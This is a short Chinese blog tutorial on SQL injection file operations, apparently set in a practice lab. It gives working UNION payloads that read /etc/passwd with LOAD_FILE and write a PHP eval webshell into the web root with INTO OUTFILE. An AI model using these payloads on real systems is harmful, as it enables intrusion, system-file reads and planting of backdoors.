0
点赞
收藏
分享

微信扫一扫

Sql注入文件读写操作

慎壹 2022-05-05 阅读 74
phpweb安全
1.文件读取函数load_file()
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回
LOAD_FILE(file_name);             LOAD_FILE(/etc/passwd);
其中file_name是文件的完整路径	

2.写入函数为into outfile()
INTO OUTFILE()函数将自定义字符串写入指定文件中 (前提权限允许写入)

SELECTINTO OUTFILE ‘file_name’  SELECTINTO OUTFILE/tmp/111

load_file读取文件

Union select 1,load_file("/etc/passwd")--+

在这里插入图片描述

写入木马文件

Union select 1,"<?php @eval($_POST[x])?>",1 into outfile '/var/www/html/Less-1/1.php'--+

在这里插入图片描述
进行连接即可 但是需要网站文件夹有写的权限 如果没有就会提示
在这里插入图片描述

举报

相关推荐

0 条评论